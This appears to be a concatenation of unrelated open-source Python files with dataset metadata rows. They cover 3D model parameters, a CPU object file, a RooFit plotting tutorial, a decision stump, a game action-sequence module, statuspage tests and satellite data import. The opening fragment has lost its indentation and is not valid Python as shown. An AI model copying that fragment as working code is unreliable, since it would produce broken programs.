# instantiate generator classes in order to make a dictionary of all model names
for i in range(0, len(model_classes)):
for variant in self.base_params.keys():
params = self.base_params[variant]
model = model_classes[i](params)
if model.make_me:
models[model.makeModelName(variant)] = self.Model(variant, params, model_classes[i])
return models
def getSampleModels(self, model_classes):
r"""Generate model parameters for all series and variants
Loops through all base parameters and model classes instantiating the classes and checks whether a variant should be made.
If a variant is to be made a namedtuple is made with the index from a call to the model instance makeModelName method
and the base parameters are copied to this. When copying the base parameters others may be added such as number of pins (num_pins).
.. note:: Typically this method is overriden in order to add calculated parameters like number of pins.
The model specific parameters are contained in the model class itself.
:param model_classes:
list of part creator classes inherited from :class:`cq_base_model.PartBase`
:type model_classes: ``list of classes``
:rtype: ```tuple````
"""
models = {}
# instantiate generator classes in order to make a dictionary of all default variants
for i in range(0, len(model_classes)):
variant = model_classes[i].default_model
params = self.base_params[variant]
model = model_classes[i](params)
if model.make_me:
models[model.makeModelName(variant)] = self. Model(variant, params, model_classes[i])
return models
def getModel(self, model_class, variant):
r"""Generate model parameters for all series and variants
Gets the parameters for a single variant.
If a variant is to be made a namedtuple is made with the index from a call to the model instance makeModelName method
and the base parameters are copied to this. When copying the base parameters others may be added such as number of pins (num_pins).
.. note:: Typically this method is overriden in order to add calculated parameters like number of pins.
The model specific parameters are contained in the model class itself.
:param model_classe:
part creator class inherited from :class:`cq_base_model.PartBase`
:type model_classes: ``list of classes``
:rtype: ```tuple````
"""
model = self.base_params.has_key(variant)
# instantiate generator class in order to make a dictionary entry for a single variant
if model:
params = self.base_params[variant]
model = model_class(params)
if not model.make_me:
model = False
return model
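# Hedged usage sketch (illustration only; the series name, pitch value and the
# generator class below are hypothetical -- real generators subclass
# cq_base_model.PartBase and provide make_me, default_model and makeModelName):
#
# class MySocketSeriesParams(PartParametersBase):
#     def __init__(self):
#         PartParametersBase.__init__(self)
#         self.base_params = {
#             'Socket_2x05': self._make_params(2.54, 2, PinStyle.STRAIGHT, CaseType.THT),
#         }
#
# models = MySocketSeriesParams().getAllModels([MySocketGenerator])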
### EOF ###
| gpl-2.0 | 6,652,362,685,478,027,000 | 37.542222 | 139 | 0.561232 | false | 4.863713 | false | false | false |
eliben/luz-cpu | luz_asm_sim/lib/asmlib/objectfile.py | 1 | 1466 | # Represents the object file recognized by the Luz architecture.
# An object file is relocatable. It is created by the assembler,
# and later combined with other object files by the linker into
# an executable.
#
# Luz micro-controller assembler
# Eli Bendersky (C) 2008-2010
#
class ObjectFile(object):
""" Use one of the factory methods to create ObjectFile
instances: from_assembler, from_file
The name of the object can be accessed via the .name
attribute.
"""
def __init__(self):
self.seg_data = {}
self.export_table = []
self.import_table = []
self.reloc_table = []
self.name = None
@classmethod
def from_assembler( cls,
seg_data,
export_table,
import_table,
reloc_table):
""" Create a new ObjectFile from assembler-generated data
structures.
"""
obj = cls()
assert isinstance(seg_data, dict)
for table in (export_table, import_table, reloc_table):
assert isinstance(table, list)
obj.seg_data = seg_data
obj.export_table = export_table
obj.import_table = import_table
obj.reloc_table = reloc_table
return obj
@classmethod
def from_file(cls, file):
""" 'file' is either a filename (a String), or a readable
IO object.
"""
pass
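# Hedged usage sketch (added for illustration, not part of the original module;
# the segment name and byte payload below are made up).
if __name__ == '__main__':
    obj = ObjectFile.from_assembler(
        seg_data={'text': b'\x00\x00\x00\x00'},
        export_table=[],
        import_table=[],
        reloc_table=[])
    obj.name = 'demo_object'
    print(obj.seg_data.keys())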
| unlicense | -8,877,308,944,578,829,000 | 28.32 | 65 | 0.572988 | false | 4.261628 | false | false | false |
karies/root | tutorials/roofit/rf205_compplot.py | 6 | 4552 | ## \file
## \ingroup tutorial_roofit
## \notebook
## Addition and convolution: options for plotting components of composite p.d.f.s.
##
## \macro_code
##
## \date February 2018
## \author Clemens Lange, Wouter Verkerke (C++ version)
import ROOT
# Set up composite pdf
# --------------------------------------
# Declare observable x
x = ROOT.RooRealVar("x", "x", 0, 10)
# Create two Gaussian PDFs g1(x,mean1,sigma) anf g2(x,mean2,sigma) and
# their parameters
mean = ROOT.RooRealVar("mean", "mean of gaussians", 5)
sigma1 = ROOT.RooRealVar("sigma1", "width of gaussians", 0.5)
sigma2 = ROOT.RooRealVar("sigma2", "width of gaussians", 1)
sig1 = ROOT.RooGaussian("sig1", "Signal component 1", x, mean, sigma1)
sig2 = ROOT.RooGaussian("sig2", "Signal component 2", x, mean, sigma2)
# Sum the signal components into a composite signal p.d.f.
sig1frac = ROOT.RooRealVar(
"sig1frac", "fraction of component 1 in signal", 0.8, 0., 1.)
sig = ROOT.RooAddPdf(
"sig", "Signal", ROOT.RooArgList(sig1, sig2), ROOT.RooArgList(sig1frac))
# Build Chebychev polynomial p.d.f.
a0 = ROOT.RooRealVar("a0", "a0", 0.5, 0., 1.)
a1 = ROOT.RooRealVar("a1", "a1", -0.2, 0., 1.)
bkg1 = ROOT.RooChebychev("bkg1", "Background 1",
x, ROOT.RooArgList(a0, a1))
# Build expontential pdf
alpha = ROOT.RooRealVar("alpha", "alpha", -1)
bkg2 = ROOT.RooExponential("bkg2", "Background 2", x, alpha)
# Sum the background components into a composite background p.d.f.
bkg1frac = ROOT.RooRealVar(
"sig1frac", "fraction of component 1 in background", 0.2, 0., 1.)
bkg = ROOT.RooAddPdf(
"bkg", "Signal", ROOT.RooArgList(bkg1, bkg2), ROOT.RooArgList(sig1frac))
# Sum the composite signal and background
bkgfrac = ROOT.RooRealVar("bkgfrac", "fraction of background", 0.5, 0., 1.)
model = ROOT.RooAddPdf(
"model", "g1+g2+a", ROOT.RooArgList(bkg, sig), ROOT.RooArgList(bkgfrac))
# Set up basic plot with data and full pdf
# ------------------------------------------------------------------------------
# Generate a data sample of 1000 events in x from model
data = model.generate(ROOT.RooArgSet(x), 1000)
# Plot data and complete PDF overlaid
xframe = x.frame(ROOT.RooFit.Title(
"Component plotting of pdf=(sig1+sig2)+(bkg1+bkg2)"))
data.plotOn(xframe)
model.plotOn(xframe)
# Clone xframe for use below
xframe2 = xframe.Clone("xframe2")
# Make component by object reference
# --------------------------------------------------------------------
# Plot single background component specified by object reference
ras_bkg = ROOT.RooArgSet(bkg)
model.plotOn(xframe, ROOT.RooFit.Components(
ras_bkg), ROOT.RooFit.LineColor(ROOT.kRed))
# Plot single background component specified by object reference
ras_bkg2 = ROOT.RooArgSet(bkg2)
model.plotOn(xframe, ROOT.RooFit.Components(ras_bkg2), ROOT.RooFit.LineStyle(
ROOT.kDashed), ROOT.RooFit.LineColor(ROOT.kRed))
# Plot multiple background components specified by object reference
# Note that specified components may occur at any level in object tree
# (e.g bkg is component of 'model' and 'sig2' is component 'sig')
ras_bkg_sig2 = ROOT.RooArgSet(bkg, sig2)
model.plotOn(xframe, ROOT.RooFit.Components(ras_bkg_sig2),
ROOT.RooFit.LineStyle(ROOT.kDotted))
# Make component by name/regexp
# ------------------------------------------------------------
# Plot single background component specified by name
model.plotOn(xframe2, ROOT.RooFit.Components(
"bkg"), ROOT.RooFit.LineColor(ROOT.kCyan))
# Plot multiple background components specified by name
model.plotOn(
xframe2,
ROOT.RooFit.Components("bkg1,sig2"),
ROOT.RooFit.LineStyle(
ROOT.kDotted),
ROOT.RooFit.LineColor(
ROOT.kCyan))
# Plot multiple background components specified by regular expression on
# name
model.plotOn(
xframe2,
ROOT.RooFit.Components("sig*"),
ROOT.RooFit.LineStyle(
ROOT.kDashed),
ROOT.RooFit.LineColor(
ROOT.kCyan))
# Plot multiple background components specified by multiple regular
# expressions on name
model.plotOn(
xframe2,
ROOT.RooFit.Components("bkg1,sig*"),
ROOT.RooFit.LineStyle(
ROOT.kDashed),
ROOT.RooFit.LineColor(
ROOT.kYellow),
ROOT.RooFit.Invisible())
# Draw the frame on the canvas
c = ROOT.TCanvas("rf205_compplot", "rf205_compplot", 800, 400)
c.Divide(2)
c.cd(1)
ROOT.gPad.SetLeftMargin(0.15)
xframe.GetYaxis().SetTitleOffset(1.4)
xframe.Draw()
c.cd(2)
ROOT.gPad.SetLeftMargin(0.15)
xframe2.GetYaxis().SetTitleOffset(1.4)
xframe2.Draw()
c.SaveAs("rf205_compplot.png")
| lgpl-2.1 | -1,549,633,416,669,288,700 | 31.985507 | 82 | 0.672012 | false | 2.931101 | false | false | false |
VCG/gp | raveler/ray/ray/decision_stump.py | 3 | 2202 |
import math
import numpy
import operator
class DecisionStump():
""" Class for a decision stump, adapted from pyclassic. """
def fit(self, X, Y, w):
feature_index, stump = train_decision_stump(X,Y,w)
self.feature_index = feature_index
self.stump = stump
return self
def predict(self,X):
if len(X.shape)==1:
X = numpy.array([X])
N, d = X.shape
feature_index = self.feature_index
threshold = self.stump.threshold
s = self.stump.s
return s*(2.0*(X[:,feature_index]>threshold).astype(numpy.uint8)-1)
class Stump:
"""1D stump"""
def __init__(self, score, threshold, s):
self.score = score
self.threshold = threshold
self.s = s
def __cmp__(self, other):
return cmp(self.score, other.score)  # compare stumps by their score ('err' is never set on Stump)
def train_decision_stump(X,Y,w):
stumps = [build_stump_1d(x,Y,w) for x in X.T]
feature_index = numpy.argmax([s.score for s in stumps])
best_stump = stumps[feature_index]
best_threshold = best_stump.threshold
return feature_index, best_stump
def build_stump_1d(x,y,w):
idx = x.argsort()
xsorted = x[idx]
wy = y[idx]*w[idx]
wy_pos = numpy.clip(wy, a_min=0, a_max=numpy.inf)
wy_neg = numpy.clip(wy, a_min=-numpy.inf, a_max=0)
score_left_pos = numpy.cumsum(wy_pos)
score_right_pos = numpy.cumsum(wy_pos[::-1])
score_left_neg = numpy.cumsum(wy_neg)
score_right_neg = numpy.cumsum(wy_neg[::-1])
score1 = -score_left_pos[0:-1:1] + score_right_neg[-2::-1]
score2 = -score_left_neg[0:-1:1] + score_right_pos[-2::-1]
# using idx will ensure that we don't split between nodes with identical x values
idx = numpy.nonzero((xsorted[:-1] < xsorted[1:]).astype(numpy.uint8))[0]
if len(idx)==0:
return Stump(-numpy.inf, 0, 0)
score = numpy.where(abs(score1)>abs(score2), score1, score2)
ind = idx[numpy.argmax(abs(score[idx]))]
maxscore = abs(score[ind])
threshold = (xsorted[ind] + xsorted[ind+1])/2.0
s = numpy.sign(score[ind]) # direction of -1 -> 1 change
return Stump(maxscore, threshold, s)
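# Hedged usage sketch (added for illustration, not part of the original module):
# a toy 1-D threshold problem with uniform boosting weights.
if __name__ == '__main__':
    X = numpy.array([[0.1], [0.2], [0.8], [0.9]])
    Y = numpy.array([-1, -1, 1, 1])
    w = numpy.ones(len(Y)) / len(Y)
    stump = DecisionStump().fit(X, Y, w)
    print(stump.predict(numpy.array([[0.05], [0.95]])))  # expected: [-1.  1.]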
| mit | 3,073,037,846,525,142,000 | 30.382353 | 85 | 0.589918 | false | 3.020576 | false | false | false |
rlc2/pygame_maker | pygame_maker/actions/action_sequence.py | 1 | 21092 | """
Author: Ron Lockwood-Childs
Licensed under LGPL v2.1 (see file COPYING for details)
Container type for sequences of actions.
"""
import re
from pygame_maker.actions.action import Action, ActionException
__all__ = ["ActionSequence", "ActionSequenceStatement",
"ActionSequenceConditional", "ActionSequenceConditionalIf",
"ActionSequenceConditionalElse", "ActionSequenceBlock",
"ActionSequenceStatementException"]
class ActionSequenceStatementException(Exception):
"""
Raised when unknown action names or something other than an action is found
in a sequence, when sequence statements are placed incorrectly, or when an
attempt is made to add something other than an ActionSequenceStatement to a
sequence.
"""
pass
class ActionSequenceStatement(object):
"""
The base class for all action sequence statements.
A "statement" wraps an action and provides structure to represent if/else
conditionals and blocks along with normal executable statements.
:param action: The action to wrap into the statement
:type action: Action
"""
@staticmethod
def get_sequence_item_from_action(action, **kwargs):
"""
Given a name or Action, retrieve its ActionSequenceStatement.
Provide a simple static method to retrieve the right statement
representing the given action: if/else condition, block, or
executable statement. Can also accept a string containing the name
of the action, in which case a new action will be retrieved with
its parameters filled in with the supplied kwargs.
:param action: An action name, or Action instance
:type action: str|Action
:param kwargs: Optional keyword arguments to apply to the named action
:return: The appropriate action sequence statement
:rtype: ActionSequenceStatement
"""
# if given a string, see if it names a known action
new_action = None
if isinstance(action, str):
try:
new_action = Action.get_action_instance_by_name(action, **kwargs)
except ActionException:
raise ActionSequenceStatementException("'{}' is not a known action".format(action))
else:
new_action = action
if not isinstance(new_action, Action):
raise ActionSequenceStatementException("'{}' is not a recognized action")
if new_action.nest_adjustment:
if new_action.name == "else":
return ActionSequenceConditionalElse(new_action)
minfo = Action.IF_STATEMENT_RE.search(new_action.name)
if minfo:
return ActionSequenceConditionalIf(new_action)
if new_action.nest_adjustment != "block_end":
return ActionSequenceBlock(new_action)
return ActionSequenceStatement(new_action)
def __init__(self, action):
self.is_block = False
self.is_conditional = False
self.action = action
def get_action_list(self):
"""
Return the statement's action list.
This method places the action inside a list of length 1.
This aids with unit testing, and it allows an action sequence to be
serialized to storage. The deserialized simple list can be expanded
into an action sequence when the application starts up.
:return: A single-element list containing the wrapped action
:rtype: list
"""
return [self.action]
def pretty_print(self, indent=0):
"""
Display the name of the wrapped action as indented code
:param indent: Number of spaces to indent
:type indent: int
"""
indent_string = "\t" * indent
print("{}{}".format(indent_string, self.action.name))
def __repr__(self):
return "<{}: {}>".format(type(self).__name__, self.action)
class ActionSequenceConditional(ActionSequenceStatement):
"""
Represent a simple conditional ('else' is the only kind this fits).
:param action: The action to wrap into the conditional
:type action: Action
"""
def __init__(self, action):
ActionSequenceStatement.__init__(self, action)
self.is_conditional = True
self.contained_statement = None
def add_statement(self, statement):
"""
Attempt to add a statement to the conditional.
Given a statement, try to add it to the current conditional. If the
clause is empty, set its statement. If the clause holds an open
block or conditional, pass it on.
:param statement: New statement to add to the conditional
:type statement: ActionSequenceStatement
:return: True if there was room for the new statement, otherwise False
:rtype: bool
"""
found_place = True
# basic type check
if not isinstance(statement, ActionSequenceStatement):
raise ActionSequenceStatementException
if not self.contained_statement:
# the statement is now the conditional clause
self.contained_statement = statement
elif (self.contained_statement.is_block and
not self.contained_statement.is_block_closed):
# the statement fits within the conditional clause's block
self.contained_statement.add_statement(statement)
elif (self.contained_statement.is_conditional and
self.contained_statement.add_statement(statement)):
# the contained conditional found a place for the statement
pass
else:
found_place = False
return found_place
def get_action_list(self):
"""
Collect the conditional's list of actions.
This method retrieves all the collected statements inside a simple
conditional into a simple list. This aids with unit testing and
allows an action sequence to be serialized to storage. The
deserialized simple list can be expanded into an action sequence
when the application starts up.
:return: A list containing the conditional's wrapped actions
:rtype: list
"""
contained_list = []
if self.contained_statement:
contained_list = self.contained_statement.get_action_list()
return [self.action] + contained_list
def pretty_print(self, indent=0):
"""
Display an action sequence simple conditional as indented code
:param indent: Number of spaces to indent
:type indent: int
"""
ActionSequenceStatement.pretty_print(self, indent)
if self.contained_statement:
self.contained_statement.pretty_print(indent+1)
def __repr__(self):
repr_str = "<{}:\n".format(type(self).__name__)
repr_str += "\t{}>".format(self.contained_statement)
return repr_str
class ActionSequenceConditionalIf(ActionSequenceConditional):
"""
Represent an entire if/else conditional.
The 'else' clause is also placed here, to avoid having to search earlier
statements to see if there is a free 'if' conditional that matches the
'else'.
:param action: The action to wrap into the 'if' conditional
:type action: Action
"""
def __init__(self, action):
ActionSequenceConditional.__init__(self, action)
self.else_condition = None
def add_statement(self, statement):
"""
Attempt to place the given statement into the clause for the 'if'.
If there is already a block or another conditional, see if the new
statement will be accepted there. If not, check whether the new
statement is an 'else' condition, and that no 'else' condition already
exists. If there is an 'else' condition that hasn't received a
statement yet, add it there. If the 'else' statement exists and
contains another conditional or block, see if the new statement
will be accepted there.
:param statement: New statement to add to the conditional
:type statement: ActionSequenceStatement
:return: True if there was room for the new statement, otherwise False
:rtype: bool
"""
found_place = True
if not ActionSequenceConditional.add_statement(self, statement):
if (not self.else_condition and
isinstance(statement, ActionSequenceConditionalElse)):
self.else_condition = statement
elif (self.else_condition and self.else_condition.is_conditional and
self.else_condition.add_statement(statement)):
# else clause had a place for the new statement
pass
elif (self.else_condition and self.else_condition.is_block and
not self.else_condition.is_block_closed):
self.else_condition.add_statement(statement)
else:
found_place = False
return found_place
def pretty_print(self, indent=0):
"""
Display an action sequence if/else conditional as indented code.
:param indent: Number of spaces to indent
:type indent: int
"""
ActionSequenceConditional.pretty_print(self, indent)
if self.else_condition:
self.else_condition.pretty_print(indent)
def walk(self):
"""
Iterate through each action within a Conditional.
:return: Generator function
:rtype: generator
"""
yield self.action
conditional_path = None
if self.action.action_result:
if not self.contained_statement:
# incomplete "if" path (can only happen to final action in list)
return
conditional_path = self.contained_statement
else:
if not self.else_condition:
# "if" not executed, and no "else" path
return
# no need to return the "else" action itself, it does nothing
conditional_path = self.else_condition.contained_statement
if conditional_path.is_block or conditional_path.is_conditional:
for action in conditional_path.walk():
yield action
else:
yield conditional_path.action
def get_action_list(self):
"""
Collect the conditional's list of actions.
This method retrieves all the collected statements inside a
conditional into a simple list. This aids with unit
testing and allows an action sequence to be serialized
to storage. The deserialized simple list can be expanded into an
action sequence when the application starts up.
:return: A list of the actions wrapped in the If conditional
:rtype: list
"""
contained_list = ActionSequenceConditional.get_action_list(self)
else_list = []
if self.else_condition:
else_list = self.else_condition.get_action_list()
return contained_list + else_list
def __repr__(self):
repr_str = "<{} {}:\n".format(type(self).__name__, self.action)
repr_str += "\t{}\n".format(self.contained_statement)
if self.else_condition:
repr_str += "{}>".format(self.else_condition)
return repr_str
class ActionSequenceConditionalElse(ActionSequenceConditional):
"""
Clone of the ActionSequenceConditional class.
Named for convenience to be used in a ActionSequenceConditionalIf.
:param action: The action to wrap into the 'else' conditional
:type action: Action
"""
def __init__(self, action):
ActionSequenceConditional.__init__(self, action)
class ActionSequenceBlock(ActionSequenceStatement):
"""
Represent a block of action statements.
All statements are placed into a block (even if just the 'main' block) or
into conditionals within a block. The first action in the main block
is set to None.
:param action: Usually a start_of_block action
:type action: Action|None
:param main_block: True if this is the main (outermost) block
:type main_blocK: bool
"""
def __init__(self, action, main_block=False):
# main block doesn't start with an explicit action, so action==None
# is ok. Remember this when trying to use self.action in any
# methods, including superclasses!
ActionSequenceStatement.__init__(self, action)
self.is_block = True
self.is_block_closed = False
self.contained_statements = []
self.main_block = main_block
def _append_statement(self, statement):
# Called by add_statement() when an action is meant for this block.
#
# :param statement: New statement to add to the block
# :type statement: ActionSequenceStatement
# the main block is never explicitly "closed"
if statement.action and statement.action.nest_adjustment == "block_end":
if not self.main_block:
self.is_block_closed = True
self.contained_statements.append(statement)
else:
raise ActionSequenceStatementException("block_end cannot be added to a main block")
elif isinstance(statement, ActionSequenceConditionalElse):
raise ActionSequenceStatementException
else:
self.contained_statements.append(statement)
def add_statement(self, statement):
"""
Add a new statement to an open block.
The action sequence "magic" happens here. Normal statements, "if"
conditionals and blocks can be added to the current block. Open
conditionals (no clause yet) or blocks (no "block_end" action) can
receive new statements. An "else" action can be attached to an "if"
conditional. All statements exist either inside a block (there is
always a "main" block) or a conditional.
:param statement: New statement to add to the block
:type statement: ActionSequenceStatement
"""
# print("Adding statement: {} .. ".format(statement))
if not isinstance(statement, ActionSequenceStatement):
raise TypeError("{} is not an ActionSequenceStatement".format(str(statement)))
last_statement = None
if self.contained_statements:
last_statement = self.contained_statements[-1]
if last_statement and last_statement.is_conditional:
# If the last statement's conditional is still open, this statement
# belongs there. Otherwise, add it to this block
if last_statement.add_statement(statement):
# print("---> to last conditional")
return
if last_statement and last_statement.is_block:
# If the last statement's block is still open, this statement
# belongs there. Otherwise, add it to this block
if not last_statement.is_block_closed:
# print("---> to last block")
last_statement.add_statement(statement)
return
# print("---> to current block")
self._append_statement(statement)
def get_action_list(self):
"""
Collect the conditional's list of actions.
This method retrieves all the collected statements inside a
block into a simple list. This aids with unit testing
and allows an action sequence to be serialized to storage.
The deserialized simple list can be expanded into an action
sequence when the application starts up.
:return: A list of the actions wrapped in the If conditional
:rtype: list
"""
this_action = []
if not self.main_block:
this_action = [self.action]
contained_list = []
if self.contained_statements:
for contained in self.contained_statements:
contained_list += contained.get_action_list()
return this_action + contained_list
def pretty_print(self, indent=0):
"""
Display the action sequence block as indented code.
:param indent: Number of spaces to indent
:type indent: int
"""
new_indent = indent
if not self.main_block:
ActionSequenceStatement.pretty_print(self, indent)
new_indent += 1
if self.contained_statements:
for contained in self.contained_statements:
if contained.action.nest_adjustment != "block_end":
contained.pretty_print(new_indent)
else:
contained.pretty_print(indent)
def walk(self):
"""
Iterate through each action within a block.
:return: Generator function
:rtype: generator
"""
for statement in self.contained_statements:
if statement.action is None:
continue
if statement.action.nest_adjustment == "block_end":
return
if statement.is_conditional or statement.is_block:
for sub_statement_action in statement.walk():
yield sub_statement_action
else:
yield statement.action
def __repr__(self):
repr_str = "<{}:\n".format(type(self).__name__)
for statement in self.contained_statements:
repr_str += "{}\n".format(statement)
repr_str += ">"
return repr_str
class ActionSequence(object):
"""Store a sequence of actions, which runs when triggered by an event."""
FIRST_ITEM_RE = re.compile(r"^\s*([^ ])")
@staticmethod
def load_sequence_from_yaml_obj(sequence_repr):
"""
Create an event action sequence from its YAML representation.
The expected format is as follows::
[{<action_name>: {<action_param>: <action_value>, ...}}, ...]
:param sequence_repr: The YAML object containing action sequence data
:type sequence_repr: yaml.load() result
:return: The action sequence described in the YAML object
:rtype: ActionSequence
"""
new_sequence = None
if sequence_repr:
new_sequence = ActionSequence()
for action_hash in sequence_repr:
action_name = list(action_hash.keys())[0]
action_params = {}
if action_hash[action_name]:
action_params.update(action_hash[action_name])
next_action = Action.get_action_instance_by_name(action_name, **action_params)
# print("New action: {}".format(next_action))
new_sequence.append_action(next_action)
return new_sequence
def __init__(self):
"""Wrap the outermost ActionSequenceBlock."""
#: The main block, containing all actions in sequence
self.main_block = ActionSequenceBlock(None, True)
def append_action(self, action):
"""
Add a new action to the end of the sequence.
:param action: The name of a defined action, or an Action instance
:type action: str|Action
"""
statement = ActionSequenceStatement.get_sequence_item_from_action(action)
self.main_block.add_statement(statement)
def get_next_action(self):
"""
Iterate through every action in the ActionSequence.
:return: Generator function
:rtype: generator
"""
for next_action in self.main_block.walk():
if next_action is not None:
yield next_action
def to_yaml(self, indent=0):
"""
Produce the YAML representation of the action sequence.
:param indent: Number of spaces to indent each line
:type indent: int
:return: YAML string
:rtype: str
"""
action_list = self.main_block.get_action_list()
sequence_yaml = ""
for action in action_list:
action_yaml_lines = action.to_yaml(indent).splitlines()
for idx, aline in enumerate(action_yaml_lines):
if idx == 0:
sline = str(aline)
minfo = self.FIRST_ITEM_RE.search(aline)
# print("first item match for '{}': {}".format(aline, minfo))
if minfo:
mpos = minfo.start(1)
# print("match pos:{}".format(mpos))
sline = "{}- {}".format(aline[0:mpos], aline[mpos:])
else:
sline = "- {}".format(aline)
sequence_yaml += "{}\n".format(sline)
else:
sequence_yaml += " {}\n".format(aline)
return sequence_yaml
def pretty_print(self):
"""Print out properly-indented action sequence strings."""
self.main_block.pretty_print()
def __repr__(self):
return "{}".format(str(self.main_block))
| lgpl-2.1 | -3,735,501,381,617,849,000 | 37.630037 | 99 | 0.619856 | false | 4.718568 | false | false | false |
mattfleaydaly/newstatuslive | statuspage/tests.py | 2 | 7197 | # -*- coding: utf-8 -*-
from __future__ import absolute_import, print_function, unicode_literals
import unittest
from datetime import datetime
from unittest import TestCase
from mock import patch, Mock
from click.testing import CliRunner
from statuspage import cli, update, create, iter_systems, get_severity, SYSTEM_LABEL_COLOR
from github import UnknownObjectException
import codecs
class CLITestCase(TestCase):
def setUp(self):
self.patcher = patch('statuspage.Github')
self.gh = self.patcher.start()
# setup mocked label
self.label = Mock()
self.label.color = "171717"
self.label.name = "Website"
self.label1 = Mock()
self.label1.color = "171717"
self.label1.name = "API"
self.gh().get_user().get_repo().get_labels.return_value = [self.label, self.label1]
# set up mocked issue
self.issue = Mock()
self.issue.created_at = datetime.now()
self.issue.state = "open"
self.issue_label = Mock()
self.issue_label.color = "FF4D4D"
self.issue_label.name = "major outage"
self.issue.get_labels.return_value = [self.issue_label, self.label]
self.issue.user.login = "some-dude"
self.comment = Mock()
self.comment.user.login = "some-dude"
self.issue.get_comments.return_value = [self.comment, ]
self.issue1 = Mock()
self.issue1.created_at = datetime.now()
self.issue1.state = "open"
self.issue1.user.login = "some-dude"
self.issue1.get_labels.return_value = [self.issue_label, self.label1]
self.issue1.get_comments.return_value = [self.comment, ]
self.gh().get_user().get_repo().get_issues.return_value = [self.issue, self.issue1]
self.template = Mock()
self.template.decoded_content = b"some foo"
self.template.content = codecs.encode(b"some other foo", "base64")
self.gh().get_user().get_repo().get_file_contents.return_value = self.template
self.gh().get_organization().get_repo().get_file_contents.return_value = self.template
self.collaborator = Mock()
self.collaborator.login = "some-dude"
self.gh().get_user().get_repo().get_collaborators.return_value = [self.collaborator,]
self.gh().get_organization().get_repo().get_collaborators.return_value = [self.collaborator,]
def tearDown(self):
self.patcher.stop()
@patch("statuspage.run_update")
def test_create(self, run_update):
label = Mock()
self.gh().get_user().create_repo().get_labels.return_value = [label,]
runner = CliRunner()
result = runner.invoke(
create,
["--name", "testrepo", "--token", "token", "--systems", "sys1,sys2"]
)
self.assertEqual(result.exit_code, 0)
self.gh.assert_called_with("token")
@patch("statuspage.run_update")
def test_create_org(self, run_update):
runner = CliRunner()
result = runner.invoke(
create,
["--name", "testrepo",
"--token", "token",
"--systems", "sys1,sys2",
"--org", "some"]
)
self.assertEqual(result.exit_code, 0)
self.gh.assert_called_with("token")
self.gh().get_organization.assert_called_with("some")
def test_update(self):
runner = CliRunner()
result = runner.invoke(update, ["--name", "testrepo", "--token", "token"])
self.assertEqual(result.exit_code, 0)
self.gh.assert_called_with("token")
self.gh().get_user().get_repo.assert_called_with(name="testrepo")
self.gh().get_user().get_repo().get_labels.assert_called_once_with()
def test_dont_update_when_nothing_changes(self):
runner = CliRunner()
self.template.content = codecs.encode(b"some foo", "base64")
result = runner.invoke(update, ["--name", "testrepo", "--token", "token"])
self.assertEqual(result.exit_code, 0)
self.gh.assert_called_with("token")
self.gh().get_user().get_repo.assert_called_with(name="testrepo")
self.gh().get_user().get_repo().get_labels.assert_called_once_with()
self.gh().get_user().get_repo().update_file.assert_not_called()
def test_update_org(self):
runner = CliRunner()
result = runner.invoke(update, ["--name", "testrepo", "--token", "token", "--org", "some"])
self.assertEqual(result.exit_code, 0)
self.gh.assert_called_with("token")
self.gh().get_organization().get_repo.assert_called_with(name="testrepo")
self.gh().get_organization().get_repo().get_labels.assert_called_once_with()
def test_update_index_does_not_exist(self):
self.gh().get_user().get_repo().update_file.side_effect = UnknownObjectException(status=404, data="foo")
runner = CliRunner()
result = runner.invoke(update, ["--name", "testrepo", "--token", "token"])
self.assertEqual(result.exit_code, 0)
self.gh.assert_called_with("token")
self.gh().get_user().get_repo.assert_called_with(name="testrepo")
self.gh().get_user().get_repo().get_labels.assert_called_once_with()
self.gh().get_user().get_repo().create_file.assert_called_once_with(
branch='gh-pages',
content='some foo',
message='initial',
path='/index.html'
)
def test_update_non_labeled_issue_not_displayed(self):
self.issue.get_labels.return_value = []
runner = CliRunner()
result = runner.invoke(update, ["--name", "testrepo", "--token", "token"])
self.assertEqual(result.exit_code, 0)
# make sure that get_comments is not called for the first issue but for the second
self.issue.get_comments.assert_not_called()
self.issue1.get_comments.assert_called_once_with()
def test_update_non_collaborator_issue_not_displayed(self):
self.issue.user.login = "some-other-dude"
runner = CliRunner()
result = runner.invoke(update, ["--name", "testrepo", "--token", "token"])
self.assertEqual(result.exit_code, 0)
# make sure that get_comments is not called for the first issue but for the second
self.issue.get_comments.assert_not_called()
self.issue1.get_comments.assert_called_once_with()
class UtilTestCase(TestCase):
def test_iter_systems(self):
label1 = Mock()
label2 = Mock()
label1.name = "website"
label1.color = SYSTEM_LABEL_COLOR
self.assertEqual(
list(iter_systems([label1, label2])),
["website", ]
)
self.assertEqual(
list(iter_systems([label2])),
[]
)
def test_severity(self):
label1 = Mock()
label2 = Mock()
label1.color = "FF4D4D"
self.assertEqual(
get_severity([label1, label2]),
"major outage"
)
label1.color = "000000"
self.assertEqual(
get_severity([label1, label2]),
None
)
if __name__ == '__main__':
unittest.main() | mit | 3,852,729,542,538,435,000 | 32.95283 | 112 | 0.599139 | false | 3.611139 | true | false | false |
birgander2/PyRAT | pyrat/load/Spaceborne_GDAL.py | 1 | 8118 | import pyrat, os
import logging
from osgeo import gdal
import glob
import numpy as np
class ENVISAT(pyrat.ImportWorker):
"""
Import of ENVISAT satellite data.
**author:** Andreas Reigber\n
**status:** --beta-- No metadata are extracted. Mostly untested!
"""
gui = {'menu': 'File|Import spaceborne', 'entry': 'ENVISAT'}
para = [{'var': 'file', 'value': '', 'type': 'openfile', 'text': 'Product file (*.N1)'}]
def __init__(self, *args, **kwargs):
super(ENVISAT, self).__init__(*args, **kwargs)
self.name = "ENVISAT IMPORT"
if len(args) == 1:
self.file = args[0]
def getsize(self, *args, **kwargs):
self.ds = gdal.Open(self.file)
if self.ds is not None:
self.band = []
for band in range(self.ds.RasterCount):
self.band.append(self.ds.GetRasterBand(band + 1))
return self.ds.RasterYSize, self.ds.RasterXSize
else:
logging.error("ERROR: product directory not recognised!")
return False, False
def block_reader(self, *args, **kwargs):
array = []
for band in self.band:
array.append(band.ReadAsArray(xoff=0, yoff=kwargs['block'][0], win_ysize=self.blocksize))
if len(array) == 1:
return array[0]
else:
return array
def close(self, *args, **kwargs):
self.ds = None # correct according to GDAL manual!!??
def getmeta(self, *args, **kwargs):
meta = {}
meta['sensor'] = "ENVISAT"
metain = self.ds.GetMetadata()
meta.update(metain)
for band in self.band:
metain = band.GetMetadata()
meta.update(metain)
return meta
@pyrat.docstringfrom(ENVISAT)
def envisat(*args, **kwargs):
return ENVISAT(*args, **kwargs).run(*args, **kwargs)
class PALSAR(pyrat.ImportWorker):
"""
Import of PALSAR satellite data. Only levels 1.1 and 1.5 are supported.
**author:** Andreas Reigber\n
